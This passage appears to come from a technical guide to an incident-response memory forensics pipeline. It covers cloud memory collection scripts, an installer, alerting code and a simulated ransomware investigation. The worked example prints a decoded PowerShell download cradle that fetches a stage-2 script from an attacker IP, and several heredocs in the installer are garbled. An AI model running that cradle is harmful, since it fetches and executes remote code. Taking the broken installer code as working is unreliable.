'ResourceType': 'snapshot',
'Tags': [{'Key': 'IR-Purpose', 'Value': 'memory-collection'}]
}]
)
snapshot_id = snapshot['SnapshotId']
log.info(f"Snapshot created: {snapshot_id}")
# Wait for snapshot to complete
log.info("Waiting for snapshot completion...")
waiter = ec2.get_waiter('snapshot_completed')
waiter.wait(SnapshotIds=[snapshot_id])
# Restart the instance
ec2.start_instances(InstanceIds=[instance_id])
log.info(f"Instance {instance_id} restarted")
return snapshot_id
def collect_linux_ec2_ssm(
instance_id: str,
region: str = 'ap-southeast-2',
s3_bucket: str = 'ir-memory-collection',
build_server: str = 'http://192.168.1.100:8888/lime'
) -> Optional[str]:
"""
Collect Linux EC2 memory via SSM Run Command + LiME.
Uploads result directly to S3 to avoid cross-region transfer costs.
"""
ssm = boto3.client('ssm', region_name=region)
ec2 = boto3.client('ec2', region_name=region)
# Get instance details for kernel version
instance = ec2.describe_instances(InstanceIds=[instance_id])
instance_data = instance['Reservations'][0]['Instances'][0]
hostname = instance_data.get('PrivateDnsName', instance_id).split('.')[0]
timestamp = datetime.now().strftime('%Y%m%d_%H%M%S')
s3_key = f"memory-images/{hostname}_{timestamp}.lime"
collection_script = f"""#!/bin/bash
set -euo pipefail
KERNEL=$(uname -r)
MODULE_URL="{build_server}/lime-$KERNEL.ko"
OUTPUT="/tmp/mem_ir_$KERNEL.lime"
# Download LiME module
curl -sf "$MODULE_URL" -o /tmp/lime_ir.ko || {{
echo "LiME module not available for kernel $KERNEL"
exit 1
}}
# Acquire memory
insmod /tmp/lime_ir.ko "path=$OUTPUT format=lime timeout=0"
rmmod lime 2>/dev/null || true
echo "Image size: $(du -sh $OUTPUT)"
echo "SHA256: $(sha256sum $OUTPUT)"
# Upload directly to S3 (avoids egress through IR network)
aws s3 cp "$OUTPUT" "s3://{s3_bucket}/{s3_key}" \
--sse aws:kms \
--no-progress
rm -f "$OUTPUT" /tmp/lime_ir.ko
echo "Upload complete: s3://{s3_bucket}/{s3_key}"
"""
response = ssm.send_command(
InstanceIds=[instance_id],
DocumentName='AWS-RunShellScript',
Parameters={'commands': [collection_script]},
Comment=f'IR memory collection {timestamp}',
TimeoutSeconds=3600,
)
command_id = response['Command']['CommandId']
log.info(f"SSM command sent: {command_id}")
# Poll for completion
while True:
time.sleep(30)
result = ssm.get_command_invocation(
CommandId=command_id,
InstanceId=instance_id
)
status = result['Status']
if status in ('Success', 'Failed', 'Cancelled', 'TimedOut'):
log.info(f"SSM command {status}: {result.get('StandardOutputContent','')[-500:]}")
break
log.info(f"Collection in progress: {status}")
return f"s3://{s3_bucket}/{s3_key}" if status == 'Success' else None
def download_from_s3_to_pipeline(
s3_uri: str,
local_dest: str,
region: str = 'ap-southeast-2'
) -> bool:
"""Download collected image from S3 to local analysis pipeline."""
import subprocess
bucket = s3_uri.replace('s3://', '').split('/')[0]
key = '/'.join(s3_uri.replace('s3://', '').split('/')[1:])
result = subprocess.run([
'aws', 's3', 'cp', s3_uri, local_dest,
'--region', region,
'--no-progress'
], capture_output=True, text=True)
return result.returncode == 0
## Azure VM memory collection
## Uses Azure Run Command to execute collection scripts on VMs
#!/usr/bin/env python3
"""Azure VM memory collection via Run Command API."""
from azure.identity import DefaultAzureCredential
from azure.mgmt.compute import ComputeManagementClient
import time, logging
log = logging.getLogger(__name__)
def collect_azure_vm(
subscription_id: str,
resource_group: str,
vm_name: str,
storage_account: str,
container: str = 'memory-images',
build_server: str = 'http://192.168.1.100:8888/lime'
) -> bool:
"""Run memory collection on an Azure VM via Run Command."""
credential = DefaultAzureCredential()
compute = ComputeManagementClient(credential, subscription_id)
# Get VM details
vm = compute.virtual_machines.get(resource_group, vm_name, expand='instanceView')
os_type = vm.storage_profile.os_disk.os_type
timestamp = time.strftime('%Y%m%d_%H%M%S')
blob_name = f"{vm_name}_{timestamp}"
if os_type == 'Windows':
script = f"""
$timestamp = '{timestamp}'
$hostname = $env:COMPUTERNAME
$output = "C:\\Windows\\Temp\\mem_ir_$timestamp.raw"
winpmem_mini_x64.exe $output
$ctx = New-AzStorageContext -StorageAccountName '{storage_account}' `
-UseConnectedAccount
Set-AzStorageBlobContent -File $output `
-Container '{container}' `
-Blob "$hostname_$timestamp.raw" `
-Context $ctx
Remove-Item $output -Force
"""
script_type = 'RunPowerShellScript'
else: # Linux
script = f"""#!/bin/bash
KERNEL=$(uname -r)
OUTPUT="/tmp/mem_ir_{timestamp}.lime"
curl -sf '{build_server}/lime-$KERNEL.ko' -o /tmp/lime_ir.ko
insmod /tmp/lime_ir.ko "path=$OUTPUT format=lime timeout=0"
rmmod lime 2>/dev/null || true
az storage blob upload --account-name '{storage_account}' \\
--container-name '{container}' \\
--name '{vm_name}_{timestamp}.lime' \\
--file "$OUTPUT" --auth-mode login
rm -f "$OUTPUT" /tmp/lime_ir.ko
"""
script_type = 'RunShellScript'
# Execute via Run Command
poller = compute.virtual_machines.begin_run_command(
resource_group, vm_name,
{'command_id': script_type, 'script': [script]}
)
result = poller.result(timeout=3600)
output = result.value[0].message if result.value else ''
log.info(f"Azure collection complete for {vm_name}: {output[-200:]}")
return 'complete' in output.lower() or 'upload' in output.lower()
One-shot pipeline installer
Everything in this post requires coordinated setup across multiple components. The one-shot installer below handles the complete pipeline deployment on a fresh Ubuntu 22.04 analysis server. Run it once, answer two prompts, and the full stack is operational. It is designed to be idempotent: running it a second time updates components without breaking what is already working.
#!/bin/bash
## install_memory_pipeline.sh
## One-shot installer for the complete memory analysis pipeline
## Ubuntu 22.04 LTS - run as root
## Usage: curl -fsSL https://raw.githubusercontent.com/yourrepo/memory-pipeline/main/install.sh | bash
set -euo pipefail
PIPELINE_VERSION="1.0.0"
PIPELINE_DIR="/srv/memory"
VENV_DIR="/opt/vol3-env"
DB_PASSWORD=$(openssl rand -base64 24 | tr -d '/+=' | head -c 20)
ANALYST_PASSWORD=$(openssl rand -base64 24 | tr -d '/+=' | head -c 20)
RED='\033[0;31m'; GREEN='\033[0;32m'; YELLOW='\033[1;33m'; NC='\033[0m'
log_ok() { echo -e "${GREEN}[+]${NC} $*"; }
log_info() { echo -e "${YELLOW}[*]${NC} $*"; }
log_err() { echo -e "${RED}[!]${NC} $*"; }
echo "=================================================="
echo " Memory Analysis Pipeline Installer v${PIPELINE_VERSION}"
echo " Analysis server setup for fleet IR"
echo "=================================================="
echo
# Preflight checks
[[ $EUID -ne 0 ]] && { log_err "Run as root"; exit 1; }
[[ $(lsb_release -rs) != "22.04" ]] && log_info "Tested on Ubuntu 22.04 - other versions may work"
# Gather config
read -p "Analysis server IP (for Velociraptor/dashboard access): " SERVER_IP
read -p "Velociraptor server IP (or same as above): " VR_SERVER_IP
SERVER_IP=${SERVER_IP:-$(hostname -I | awk '{print $1}')}
VR_SERVER_IP=${VR_SERVER_IP:-$SERVER_IP}
log_info "Installing system packages"
apt-get update -qq
DEBIAN_FRONTEND=noninteractive apt-get install -y -qq \
python3 python3-pip python3-venv python3-dev \
git curl wget jq bc \
parallel yara foremost bulk-extractor sleuthkit \
docker.io docker-compose-plugin \
postgresql-14 postgresql-client-14 \
redis-server \
nginx \
smbclient \
p7zip-full unzip \
net-tools iotop iftop \
libssl-dev libffi-dev libpq-dev \
build-essential
log_ok "System packages installed"
# Create analyst user
if ! id analyst &>/dev/null; then
useradd -m -s /bin/bash analyst
usermod -aG docker analyst
log_ok "Analyst user created"
fi
# Directory structure
mkdir -p $PIPELINE_DIR/{landing,processing,complete,reports,yara_rules/rules,logs,tools,lime_modules}
mkdir -p $PIPELINE_DIR/yara_rules/clean_samples
mkdir -p /etc/memory-ir
chown -R analyst:analyst $PIPELINE_DIR
log_ok "Directory structure created"
# Python virtual environment
log_info "Setting up Python environment"
python3 -m venv $VENV_DIR
source $VENV_DIR/bin/activate
pip install --upgrade pip -q
pip install -q \
volatility3 \
yara-python \
pefile \
capstone \
python-magic \
requests \
psycopg2-binary \
redis \
celery[redis] \
flower \
jinja2 \
flask \
watchdog \
boto3 \
azure-identity \
azure-mgmt-compute
log_ok "Python environment ready: $(vol --version)"
# Volatility symbols
log_info "Downloading Volatility symbol tables (this takes a few minutes)"
mkdir -p /opt/vol3-symbols
if [ ! -f /opt/vol3-symbols/windows.zip ]; then
wget -q --show-progress \
https://downloads.volatilityfoundation.org/volatility3/symbols/windows.zip \
-O /opt/vol3-symbols/windows.zip
cd /opt/vol3-symbols
unzip -q windows.zip -d windows/
fi
SITE_PKGS=$(python3 -c "import site; print(site.getsitepackages()[0])")
ln -sf /opt/vol3-symbols "$SITE_PKGS/volatility3/symbols" 2>/dev/null || true
log_ok "Volatility symbols installed"
# PostgreSQL
log_info "Configuring PostgreSQL"
systemctl start postgresql
systemctl enable postgresql
sudo -u postgres psql -q < /etc/memory-ir/db.env << DBEOF
POSTGRES_URL=postgresql://analyst:${DB_PASSWORD}@localhost/memory_analysis
CELERY_BROKER_URL=redis://localhost:6379/0
DBEOF
chmod 640 /etc/memory-ir/db.env
chown analyst:analyst /etc/memory-ir/db.env
# Initialize schema
source /etc/memory-ir/db.env
PGPASSWORD=$DB_PASSWORD psql -U analyst -d memory_analysis -h localhost </dev/null || \
log_info "WinPmem download failed - download manually from $WINPMEM_URL"
# Systemd services
log_info "Installing systemd services"
# Image watcher service
cat > /etc/systemd/system/memory-watcher.service < /etc/systemd/system/memory-celery-triage.service < /etc/systemd/system/memory-celery-deep.service < /root/memory-pipeline-credentials.txt << CREDEOF
Memory Analysis Pipeline - Installation Credentials
====================================================
Generated: $(date)
Server IP: $SERVER_IP
PostgreSQL:
Host: localhost
Database: memory_analysis
User: analyst
Password: $DB_PASSWORD
URL: postgresql://analyst:${DB_PASSWORD}@localhost/memory_analysis
Dashboard:
URL: http://${SERVER_IP}:8080
Celery Monitor (Flower):
URL: http://${SERVER_IP}:5555
Pipeline directories:
Landing: $PIPELINE_DIR/landing
Reports: $PIPELINE_DIR/reports
Logs: $PIPELINE_DIR/logs
Yara rules: $PIPELINE_DIR/yara_rules/rules/
CREDEOF
chmod 600 /root/memory-pipeline-credentials.txt
echo
echo "=================================================="
log_ok "Installation complete!"
echo "=================================================="
echo
echo "Next steps:"
echo " 1. Copy pipeline scripts to $PIPELINE_DIR/pipeline/"
echo " 2. Add your Yara rules to $PIPELINE_DIR/yara_rules/rules/"
echo " 3. Start services: systemctl start memory-watcher memory-celery-triage memory-celery-deep"
echo " 4. Check credentials: cat /root/memory-pipeline-credentials.txt"
echo " 5. Drop a test image into $PIPELINE_DIR/landing/ and watch the logs"
echo
echo "Dashboard will be available at: http://${SERVER_IP}:8080"
Alert integration: Slack, email, and PagerDuty notifications
A pipeline that silently processes images and writes results to a database is only useful if analysts are notified when high-risk findings arrive. The alert integration hooks into the report generation stage of the Celery pipeline and fires notifications through whichever channel your team monitors during incidents.
## pipeline/alerts.py - Multi-channel alerting for critical findings
import os
import json
import logging
import smtplib
import requests
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from typing import Dict, Optional
log = logging.getLogger(__name__)
# Configuration - set via environment variables
SLACK_WEBHOOK_URL = os.environ.get('SLACK_WEBHOOK_URL', '')
PAGERDUTY_KEY = os.environ.get('PAGERDUTY_INTEGRATION_KEY', '')
ALERT_EMAIL_FROM = os.environ.get('ALERT_EMAIL_FROM', '')
ALERT_EMAIL_TO = os.environ.get('ALERT_EMAIL_TO', '')
SMTP_HOST = os.environ.get('SMTP_HOST', 'localhost')
SMTP_PORT = int(os.environ.get('SMTP_PORT', '587'))
DASHBOARD_URL = os.environ.get('DASHBOARD_URL', 'http://localhost:8080')
def send_slack_alert(report: Dict) -> bool:
"""Send a Slack notification for high/critical findings."""
if not SLACK_WEBHOOK_URL:
return False
hostname = report.get('hostname', 'unknown')
risk_label = report.get('risk_label', 'UNKNOWN')
risk_score = report.get('risk_score', 0)
image_id = report.get('image_id', 0)
has_malfind = report.get('has_malfind', False)
ioc_count = report.get('ioc_count', 0)
susp_procs = report.get('suspicious_procs', 0)
colour = {
'CRITICAL': '#FF0000',
'HIGH': '#FF8C00',
'MEDIUM': '#FFD700',
'LOW': '#00FF00',
}.get(risk_label, '#808080')
# Build IOC summary
ioc_summary = ''
if report.get('iocs'):
top_iocs = report['iocs'][:5]
ioc_summary = '\n'.join(
f" `{i['type']}`: {i['value'][:60]}" for i in top_iocs
)
if len(report['iocs']) > 5:
ioc_summary += f"\n ...and {len(report['iocs'])-5} more"
payload = {
'attachments': [{
'color': colour,
'title': f":rotating_light: Memory Analysis Alert: {hostname}",
'title_link': f"{DASHBOARD_URL}/host/{image_id}",
'fields': [
{'title': 'Risk Level', 'value': risk_label, 'short': True},
{'title': 'Risk Score', 'value': str(risk_score), 'short': True},
{'title': 'Malfind', 'value': 'YES :red_circle:' if has_malfind else 'No', 'short': True},
{'title': 'IOCs Found', 'value': str(ioc_count), 'short': True},
{'title': 'Suspicious Processes', 'value': str(susp_procs), 'short': True},
],
'text': f"*Top IOCs:*\n{ioc_summary}" if ioc_summary else '',
'footer': 'Memory Analysis Pipeline',
'ts': int(__import__('time').time()),
}]
}
try:
resp = requests.post(SLACK_WEBHOOK_URL, json=payload, timeout=10)
resp.raise_for_status()
log.info(f"Slack alert sent for {hostname}")
return True
except Exception as e:
log.error(f"Slack alert failed: {e}")
return False
def send_pagerduty_alert(report: Dict) -> bool:
"""Create a PagerDuty incident for critical findings."""
if not PAGERDUTY_KEY or report.get('risk_label') != 'CRITICAL':
return False
hostname = report.get('hostname', 'unknown')
payload = {
'routing_key': PAGERDUTY_KEY,
'event_action': 'trigger',
'dedup_key': f"memory-ir-{hostname}-{report.get('image_id')}",
'payload': {
'summary': f"CRITICAL memory finding on {hostname} - Score: {report.get('risk_score')}",
'severity': 'critical',
'source': 'memory-analysis-pipeline',
'component': hostname,
'group': 'incident-response',
'class': 'memory-forensics',
'custom_details': {
'image_id': report.get('image_id'),
'has_malfind': report.get('has_malfind'),
'ioc_count': report.get('ioc_count'),
'suspicious_procs': report.get('suspicious_procs'),
'dashboard_url': f"{DASHBOARD_URL}/host/{report.get('image_id')}",
'top_iocs': report.get('iocs', [])[:3],
}
},
'links': [{
'href': f"{DASHBOARD_URL}/host/{report.get('image_id')}",
'text': 'View in Dashboard'
}]
}
try:
resp = requests.post(
'https://events.pagerduty.com/v2/enqueue',
json=payload, timeout=10
)
resp.raise_for_status()
log.info(f"PagerDuty incident created for {hostname}")
return True
except Exception as e:
log.error(f"PagerDuty alert failed: {e}")
return False
def send_email_alert(report: Dict) -> bool:
"""Send an email alert for high and critical findings."""
if not all([ALERT_EMAIL_FROM, ALERT_EMAIL_TO, SMTP_HOST]):
return False
hostname = report.get('hostname', 'unknown')
risk_label = report.get('risk_label', 'UNKNOWN')
subject = f"[{risk_label}] Memory Analysis Alert: {hostname}"
body = f"""
Memory Analysis Pipeline Alert
================================
Host: {hostname}
Risk Level: {risk_label}
Risk Score: {report.get('risk_score', 0)}
Image ID: {report.get('image_id')}
Has Malfind: {'YES - INJECTION DETECTED' if report.get('has_malfind') else 'No'}
IOCs Found: {report.get('ioc_count', 0)}
Susp. Procs: {report.get('suspicious_procs', 0)}
Dashboard: {DASHBOARD_URL}/host/{report.get('image_id')}
Top IOCs:
"""
for ioc in report.get('iocs', [])[:10]:
body += f" [{ioc['type']}] {ioc['value']}\n"
if report.get('malfind_regions'):
body += "\nInjection Indicators:\n"
for m in report['malfind_regions'][:5]:
body += f" PID {m['pid']} ({m['process']}): {m['protection']} "
body += f"PE={'YES' if m.get('has_pe') else 'no'} Risk={m['risk']}\n"
body += "\n--\nMemory Analysis Pipeline - automated notification"
msg = MIMEMultipart()
msg['From'] = ALERT_EMAIL_FROM
msg['To'] = ALERT_EMAIL_TO
msg['Subject'] = subject
msg.attach(MIMEText(body, 'plain'))
try:
with smtplib.SMTP(SMTP_HOST, SMTP_PORT, timeout=15) as smtp:
smtp.starttls()
smtp.sendmail(ALERT_EMAIL_FROM, [ALERT_EMAIL_TO], msg.as_string())
log.info(f"Email alert sent for {hostname}")
return True
except Exception as e:
log.error(f"Email alert failed: {e}")
return False
def fire_alerts(report: Dict) -> None:
"""Fire all configured alerts for a completed analysis report."""
risk_label = report.get('risk_label', 'LOW')
if risk_label not in ('HIGH', 'CRITICAL'):
return
hostname = report.get('hostname', 'unknown')
log.info(f"Firing alerts for {hostname} (risk={risk_label})")
send_slack_alert(report)
send_email_alert(report)
if risk_label == 'CRITICAL':
send_pagerduty_alert(report)
## Add to /etc/memory-ir/alerts.env and load in all service unit files:
# SLACK_WEBHOOK_URL=https://hooks.slack.com/services/YOUR/WEBHOOK/URL
# PAGERDUTY_INTEGRATION_KEY=your_pd_integration_key
# ALERT_EMAIL_FROM=memory-pipeline@corp.local
# ALERT_EMAIL_TO=ir-team@corp.local
# SMTP_HOST=smtp.corp.local
# SMTP_PORT=587
# DASHBOARD_URL=http://192.168.1.100:8080
Troubleshooting: common failures and fixes
These are the failures that actually happen in production deployments, with the specific fix for each one.
Volatility fails with “No suitable address space mapping found”. This means Volatility could not identify the OS version from the memory image. The most common cause is missing symbol tables. Check that the symbol tables are correctly linked:
## Symbol table troubleshooting
source /opt/vol3-env/bin/activate
# Verify symbols are accessible
python3 -c "
import volatility3.symbols
import os
sym_path = os.path.dirname(volatility3.symbols.__file__)
print('Symbol path:', sym_path)
windows_syms = os.path.join(sym_path, 'windows')
if os.path.isdir(windows_syms):
nspkg = os.listdir(windows_syms)
print(f'Windows symbol files: {len(nspkg)}')
print('Sample:', nspkg[:3] if nspkg else 'NONE - symbols missing')
else:
print('ERROR: No windows symbol directory found')
"
# If symbols missing, re-download and re-link
wget -q https://downloads.volatilityfoundation.org/volatility3/symbols/windows.zip \
-O /tmp/windows.zip
mkdir -p /opt/vol3-symbols
unzip -q /tmp/windows.zip -d /opt/vol3-symbols/windows/
SITE=$(python3 -c "import site; print(site.getsitepackages()[0])")
rm -f $SITE/volatility3/symbols/windows
ln -sf /opt/vol3-symbols/windows $SITE/volatility3/symbols/windows
echo "Symbols re-linked"
# Test with a real image
vol -f /srv/memory/landing/test.raw windows.info 2>&1 | head -20
Image watcher detects the file but pipeline does not start. The watcher detected the file but the Celery worker is not processing tasks. Check the worker is actually running and connected to Redis:
## Pipeline connectivity troubleshooting
# Check Celery workers are running
systemctl status memory-celery-triage memory-celery-deep
# Check Redis is reachable
redis-cli ping # Should return PONG
# Check queue has tasks
redis-cli llen celery # Default queue
redis-cli llen triage # Triage queue
# Check for failed tasks (tasks that errored and are stuck)
source /opt/vol3-env/bin/activate
celery -A pipeline inspect active
celery -A pipeline inspect scheduled
celery -A pipeline inspect reserved
# Manually trigger pipeline for an existing image
python3 -c "
import sys
sys.path.insert(0, '/srv/memory/pipeline')
from pipeline import validate_image
validate_image.delay(int(sys.argv[1]))
print('Task queued')
" 123 # Replace 123 with the image ID from the database
# Watch the triage worker log in real time
tail -f /srv/memory/logs/celery_triage.log
Memory image SHA256 does not match expected value. The image was corrupted during transfer. This happens most commonly when the network drops mid-transfer or when the image file was still being written when the watcher triggered. The validation stage catches this and marks the image as invalid, but the image needs to be re-collected:
## Handling corrupt or partial images
# Check which images failed validation
psql postgresql://analyst:changeme@localhost/memory_analysis -c "
SELECT id, hostname, status, image_size_gb, sha256
FROM memory_images
WHERE status IN ('validation_failed', 'pending')
ORDER BY received_at DESC;"
# Check if image file looks complete
python3 -c "
import sys
from pathlib import Path
img = Path(sys.argv[1])
size_gb = img.stat().st_size / 1e9
# A 16GB RAM system should produce at least 10GB compressed
print(f'File: {img.name}')
print(f'Size: {size_gb:.2f} GB')
# Read last 1KB to check it is not truncated mid-write
with open(img, 'rb') as f:
f.seek(-1024, 2)
tail = f.read(1024)
print(f'Last 1KB entropy: {len(set(tail))} unique bytes (low=truncated, high=ok)')
" /srv/memory/landing/suspicious_image.raw
# Re-queue a corrected image for processing
psql postgresql://analyst:changeme@localhost/memory_analysis -c "
UPDATE memory_images SET status = 'received' WHERE id = 123;"
# Then manually trigger: validate_image.delay(123)
Malfind returns no results on a known-compromised image. Two common causes. First, if the image is from a 32-bit process but Volatility is applying 64-bit analysis, malfind will miss 32-bit injection artefacts. Second, certain process protections (PPL, anticheat, certain EDR implementations) prevent Volatility from reading process memory correctly even from a raw image.
## Malfind troubleshooting
# Check the OS and process bitness
vol -f memory.raw windows.info
vol -f memory.raw windows.pslist | head -20
# Try running malfind against a specific PID explicitly
vol -f memory.raw windows.malfind --pid 1234
# If malfind misses things, try the raw VAD scanner
vol -f memory.raw windows.vadinfo --pid 1234 | grep EXECUTE
# Cross-check with alternative approach: look for RWX memory directly
vol -f memory.raw windows.vadwalk --pid 1234 | \
grep -E "(EXECUTE_READ_WRITE|EXECUTE_WRITECOPY)"
# For 32-bit processes on 64-bit systems, the WOW64 layer
# requires specific handling - check the process bitness:
vol -f memory.raw windows.dlllist --pid 1234 | grep "wow64\|WoW64" | head -5
Pipeline processes images but risk scores are all zero. The triage stage ran but found nothing suspicious. This is usually correct, but if you know the image is from a compromised host it means the anomaly detection rules need tuning for your environment. The most common cause is that the suspicious parent-child pairs in the triage code do not match the specific process names on that system:
## Risk scoring troubleshooting
# Check what the triage actually found
psql postgresql://analyst:changeme@localhost/memory_analysis -c "
SELECT
mi.hostname,
tr.process_count,
tr.suspicious_process_count,
tr.network_conn_count,
tr.risk_score,
tr.triage_summary
FROM memory_images mi
LEFT JOIN triage_results tr ON tr.image_id = mi.id
WHERE mi.id = 123;"
# List all processes that were analysed
psql postgresql://analyst:changeme@localhost/memory_analysis -c "
SELECT pid, ppid, name, path, is_suspicious, suspicious_reason
FROM process_list
WHERE image_id = 123
ORDER BY is_suspicious DESC, pid;"
# If you know a specific process is malicious but it was not flagged,
# check what parent name the triage code saw vs what was expected
psql postgresql://analyst:changeme@localhost/memory_analysis -c "
SELECT pl.pid, pl.name, pl.path,
parent.name AS parent_name
FROM process_list pl
LEFT JOIN process_list parent ON parent.pid = pl.ppid AND parent.image_id = pl.image_id
WHERE pl.image_id = 123
ORDER BY pl.pid;"
End-to-end worked example: a simulated ransomware incident
This section walks through the complete pipeline from the moment a threat is detected through to a final analyst report, using a realistic scenario. A Monday morning at 07:15 UTC. The SOC receives an alert that a domain controller (DC01, 64GB RAM) and three workstations (WS-FINANCE-01, WS-FINANCE-02, WS-FINANCE-03, 16GB RAM each) are showing unusual SMB activity and encrypted file extensions appearing on a file server. The decision is made to collect memory from all four systems before any containment action that might destroy volatile evidence.
## Step 1: Run the network impact assessment before starting anything
python3 /srv/memory/network_impact.py << 'EOF'
endpoints = {
"dc01_64gb": {"count": 1, "ram_gb": 64, "compression_ratio": 0.60},
"finance_workstations": {"count": 3, "ram_gb": 16, "compression_ratio": 0.65},
}
link_speed_mbps = 1000
max_utilisation = 0.30
EOF
## Output:
## dc01_64gb:
## Compressed size: ~38.4 GB per image
## Transfer time: ~17.1 minutes per host at 30% link
## finance_workstations:
## Compressed size: ~10.4 GB per image
## Transfer time: ~4.6 minutes per host at 30% link
##
## Total data volume: 69.6 GB
## Recommended max concurrent collections: 3 endpoints
## Total sequential time: ~33 minutes
## Step 2: Launch tiered collection
## DC01 goes first (tier 1) at higher throttle
## Workstations collect in parallel (tier 3)
python3 /srv/memory/collection_orchestrator.py \
--config /etc/velociraptor/server.config.yaml << 'EOF'
targets = [
CollectionTarget("DC01", "C.abc123", tier=1, ram_gb=64, priority_ioc=True),
CollectionTarget("WS-FINANCE-01", "C.def456", tier=3, ram_gb=16, priority_ioc=True),
CollectionTarget("WS-FINANCE-02", "C.ghi789", tier=3, ram_gb=16),
CollectionTarget("WS-FINANCE-03", "C.jkl012", tier=3, ram_gb=16),
]
EOF
## Collection log output:
## 07:16:01 Starting Tier 1: DCs and critical servers
## 07:16:02 Started: DC01 (hunt: H.001)
## 07:33:14 Completed: DC01 (17.2 min)
## 07:33:15 Starting Tier 3: Workstations
## 07:33:16 Started: WS-FINANCE-01 (hunt: H.002)
## 07:33:16 Started: WS-FINANCE-02 (hunt: H.003)
## 07:33:16 Started: WS-FINANCE-03 (hunt: H.004)
## 07:38:01 Completed: WS-FINANCE-01 (4.7 min)
## 07:38:22 Completed: WS-FINANCE-02 (5.1 min)
## 07:39:05 Completed: WS-FINANCE-03 (5.8 min)
## 07:39:05 Tier 3 complete
## Campaign complete: 4/4 collected in 23.1 min
## Step 3: Pipeline auto-processes images as they land
## Watch the processing in real time
watch -n 10 'psql postgresql://analyst:changeme@localhost/memory_analysis \
-c "SELECT hostname, status, risk_score,
suspicious_process_count, has_malfind
FROM memory_images mi
LEFT JOIN triage_results tr ON tr.image_id = mi.id
ORDER BY received_at;"'
## By 07:52 UTC (36 min after collection started) all four are complete:
##
## hostname | status | risk_score | susp_procs | malfind
## ---------------+----------+------------+------------+--------
## DC01 | complete | 85 | 3 | t
## WS-FINANCE-01 | complete | 70 | 2 | t
## WS-FINANCE-02 | complete | 20 | 1 | f
## WS-FINANCE-03 | complete | 5 | 0 | f
## Step 4: Slack alert fires at 07:38 when WS-FINANCE-01 completes
##
## :rotating_light: Memory Analysis Alert: WS-FINANCE-01
## Risk Level: HIGH
## Risk Score: 70
## Malfind: YES :red_circle:
## IOCs Found: 4
## Susp. Procs: 2
##
## Top IOCs:
## ip_address: 185.220.101.47 (port 443)
## url: https://185.220.101.47/submit.php
## url: https://185.220.101.47/stage2.ps1
##
## At 07:41 PagerDuty fires when DC01 completes with CRITICAL risk score 85
## Step 5: Run fleet correlation
python3 /srv/memory/cross_correlation.py
## Output:
## SHARED C2 IPs DETECTED across 1 IP:
## 185.220.101.47:443 on 2 hosts: ['DC01', 'WS-FINANCE-01']
##
## Shared injection patterns: 2 hosts have EXECUTE_READ_WRITE anonymous regions
## Lateral movement indicators:
## powershell.exe on WS-FINANCE-01 at 06:52:14
## powershell.exe on DC01 at 06:58:33 (6 min later)
## powershell.exe on WS-FINANCE-02 at 07:03:11 (5 min later)
## Step 6: Deep dive DC01 - the most critical finding
## Get the image path and run additional plugins
DC01_IMAGE=$(psql postgresql://analyst:changeme@localhost/memory_analysis \
-t -c "SELECT image_path FROM memory_images WHERE hostname='DC01';")
source /opt/vol3-env/bin/activate
# Get command lines for the 3 suspicious processes
vol -f $DC01_IMAGE windows.cmdline | grep -A1 "powershell\|cmd\|mshta" | head -30
## Output shows:
## PID 4892 - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
## CommandLine: powershell.exe -NonInteractive -NoProfile -enc SQBFAFgA...
##
## Decode it:
echo "SQBFAFgA..." | base64 -d | iconv -f utf-16le -t utf-8
## IEX (New-Object Net.WebClient).DownloadString('https://185.220.101.47/stage2.ps1')
# Dump the malfind region for the injected code
MALFIND_ADDR=$(psql postgresql://analyst:changeme@localhost/memory_analysis \
-t -c "SELECT vad_start FROM malfind_results
WHERE image_id=(SELECT id FROM memory_images WHERE hostname='DC01')
AND risk_level='CRITICAL' LIMIT 1;")
vol -f $DC01_IMAGE windows.dumpfiles --virtaddr $MALFIND_ADDR \
--pid 4892 -o /srv/memory/reports/DC01/
# Run Yara against the dump
yara /srv/memory/yara_rules/combined.yar /srv/memory/reports/DC01/*.img
## CobaltStrike_Beacon_Config_Decoded matched: /srv/memory/reports/DC01/file.0x4892.img
## Step 7: Analyst conclusion and IoC extraction for blocking
python3 /srv/memory/cross_correlation.py > /srv/memory/reports/fleet_final.json
# Extract all IOCs for firewall/EDR blocking
psql postgresql://analyst:changeme@localhost/memory_analysis -c "
SELECT DISTINCT ioc_type, ioc_value, COUNT(DISTINCT image_id) AS host_count
FROM iocs_extracted
GROUP BY ioc_type, ioc_value
ORDER BY host_count DESC, ioc_type;" | tee /srv/memory/reports/iocs_for_blocking.txt
## ioc_type | ioc_value | host_count
## ------------+---------------------+-----------
## ip_address | 185.220.101.47 | 2
## url | .../submit.php | 2
## url | .../stage2.ps1 | 1
## Timeline: 07:15 alert -> 07:39 all images collected -> 07:52 all processed
## -> 07:55 fleet correlation complete -> 08:05 IOCs extracted for blocking
## Total: 50 minutes from alert to actionable IOCs from memory analysis of 4 hosts
The complete timeline from initial alert to actionable intelligence was 50 minutes for four endpoints. The network impact across the collection phase stayed below 28% of the available 1Gbps link. The pipeline processed all four images automatically without analyst intervention beyond launching the collection campaign and reviewing the dashboard. The Slack and PagerDuty alerts fired as each critical finding completed, meaning analysts were reviewing DC01’s results while WS-FINANCE-02 and WS-FINANCE-03 were still being collected.
The key finding that would not have been available from event log analysis alone: the base64 encoded PowerShell command in DC01’s process memory decoded to the exact C2 URL, which was then cross-correlated across all four images to show that WS-FINANCE-01 had contacted the same infrastructure six minutes before the first event log entry appeared on DC01. Memory forensics provided a six-minute earlier indicator of compromise than the event log did, because the process memory captured the in-flight download cradle before the connection appeared in any log.